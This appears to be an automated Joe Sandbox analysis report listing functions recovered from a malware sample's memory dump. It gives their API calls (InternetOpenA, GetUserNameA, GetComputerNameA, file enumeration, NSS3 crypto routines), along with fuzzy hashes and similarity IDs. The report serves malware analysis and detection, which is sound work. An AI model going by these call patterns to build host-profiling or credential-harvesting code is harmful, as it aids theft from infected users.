Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 4fbfd6e63816efb78282a8a9c0551e9a052a059a66ae917cbc5c2667a33c86f9
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 4fbfd6e63816efb78282a8a9c0551e9a052a059a66ae917cbc5c2667a33c86f9
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 83a405df832b88effe91af79f10c3a4574fa9362545a7917d93a7be3b7317ec1
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 83a405df832b88effe91af79f10c3a4574fa9362545a7917d93a7be3b7317ec1
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 918b7b88533f71405e98e2acd148c78ff00498b94fa877e25bd734e82c901046
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 918b7b88533f71405e98e2acd148c78ff00498b94fa877e25bd734e82c901046
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,02F568C8), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: fb0faf65adcc50b81e4047661b44d552edbf90345dc23c63fa37ae7ddc91f74f
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: fb0faf65adcc50b81e4047661b44d552edbf90345dc23c63fa37ae7ddc91f74f
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 26f38f0c02cf8c2c8d41f9535afb0b730a669b7cadc6e972aa7f41020845ae49
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: 26f38f0c02cf8c2c8d41f9535afb0b730a669b7cadc6e972aa7f41020845ae49
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F518D8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6BCC9BB0 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 452stringCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(83000070,?,?,00000000,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6BCC9C18
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000,00000010,?,6BCC2403), ref: 6BCC9C67
PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,?,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&), ref: 6BCC9CA3
memcpy.VCRUNTIME140(?,?,00000000,?,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6BCC9CEA
PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,?,?,6BCC2403,00000010,?,6BCC990F), ref: 6BCC9D26
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B), ref: 6BCC9D70
strchr.VCRUNTIME140(6BCC990F,?), ref: 6BCC9DA4
PORT_ArenaGrow_Util.NSS3(6BCC2403,?,00000000,?), ref: 6BCC9DE7

Part of subcall function 6BCD1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6BC7895A,00000000,?,00000000,?,00000000,?,00000000,?,6BC6F599,?,00000000), ref: 6BCD136A
Part of subcall function 6BCD1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6BC7895A,00000000,?,00000000,?,00000000,?,00000000,?,6BC6F599,?,00000000), ref: 6BCD137E
Part of subcall function 6BCD1340: PL_ArenaGrow.NSS3(?,6BC6F599,?,00000000,?,6BC7895A,00000000,?,00000000,?,00000000,?,00000000,?,6BC6F599,?), ref: 6BCD13CF
Part of subcall function 6BCD1340: PR_Unlock.NSS3(?,?,6BC7895A,00000000,?,00000000,?,00000000,?,00000000,?,6BC6F599,?,00000000), ref: 6BCD145C

PR_snprintf.NSS3(00000010,00000004,%%%02X,?), ref: 6BCC9E0D
PORT_ArenaGrow_Util.NSS3(6BCC2403,?,00000000,?), ref: 6BCC9E52
realloc.MOZGLUE(?,?), ref: 6BCC9E76
realloc.MOZGLUE(?,?), ref: 6BCC9EA5
PORT_ArenaGrow_Util.NSS3(6BCC2403,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BCC2403), ref: 6BCC9F15
realloc.MOZGLUE(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6BCC2403), ref: 6BCC9F4A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BCC2403), ref: 6BCC9F6A
PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,-00000001), ref: 6BCC9FAB
realloc.MOZGLUE(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BCC9FC2
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BCC9FE2
free.MOZGLUE(?), ref: 6BCC9FFA
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BCCA021
free.MOZGLUE(?), ref: 6BCCA040
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BCC2403), ref: 6BCCA052
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&), ref: 6BCCA078
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,6BCC2403,00000010,?,6BCC990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000,00000010), ref: 6BCCA08D

Strings

%%%02X, xrefs: 6BCC9E02

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Arena$Grow_Util$Errorrealloc$strlen$freememcpy$CriticalEnterGrowR_snprintfSectionUnlockValuestrchr
String ID: %%%02X
API String ID: 4704135-3569721977
Opcode ID: 365cf0313aaf769c41c3033b1af729fad4194555953dcccae0a038b7cd610497
Instruction ID: 7c8f6d479ab1e51f23df8460bdc48eb1743753648f49f3d5ac72964608b6935e
Opcode Fuzzy Hash: 365cf0313aaf769c41c3033b1af729fad4194555953dcccae0a038b7cd610497
Instruction Fuzzy Hash: 36E11A70E111169FDB10CFA9C88469FF7B5BF65358B148168E819E7201F739EA11CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
HeapAlloc.KERNEL32(00000000), ref: 00412207
wsprintfA.USER32 ref: 00412223
FindFirstFileA.KERNEL32(?,?), ref: 0041223A
StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
FindClose.KERNEL32(000000FF), ref: 00412314
lstrcat.KERNEL32(?,02F51728), ref: 00412339
lstrcat.KERNEL32(?,02F55928), ref: 0041234C
lstrlen.KERNEL32(?), ref: 00412359
lstrlen.KERNEL32(?), ref: 0041236A

Strings

%s\*, xrefs: 00412217
%s\%s, xrefs: 00412295

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
Opcode Fuzzy Hash: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA0BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6BCA0BFA

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BCA0C18
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6BCA0C2E
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BCA0C39
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BCA0C45
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BCA0CC1
PORT_Alloc_Util.NSS3(?), ref: 6BCA0CDA
memcpy.VCRUNTIME140(?,?,?), ref: 6BCA0D1B
PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6BCA0D79
PR_SetError.NSS3(FFFFE006,00000000), ref: 6BCA0DB2
PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6BCA0DE4
PR_SetError.NSS3(FFFFE001,00000000), ref: 6BCA0DFE
PR_SetError.NSS3(FFFFE064,00000000), ref: 6BCA0E2C
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BCA0E38
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BCA0E44
free.MOZGLUE(?), ref: 6BCA0E7E
free.MOZGLUE(?), ref: 6BCA0EAE

Memory Dump Source

